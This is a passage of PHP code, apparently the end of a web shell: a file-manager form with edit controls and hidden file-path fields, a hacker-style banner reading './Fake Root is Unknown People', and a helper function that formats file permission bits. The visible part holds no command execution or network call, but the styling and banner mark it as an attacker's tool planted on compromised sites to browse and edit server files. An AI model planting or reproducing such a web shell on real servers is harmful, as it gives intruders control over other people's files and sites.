<option value="edit">EDIT</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value="GO" style="margin-top:6px;width:27px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px">
</form></center></td>
</tr>';
}
echo '</table>
</div>';
}
echo '
<center><br/><font face="Kelly Slab" color="white" style="text-shadow: 0 0 20px blue, 0 0 5px blue, 0 0 7px blue, 0 0 45px blue; font-weight:bold: blue; font-size:30px">./Fake Root is Unknown People</center>
</body>
</html></div>';
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>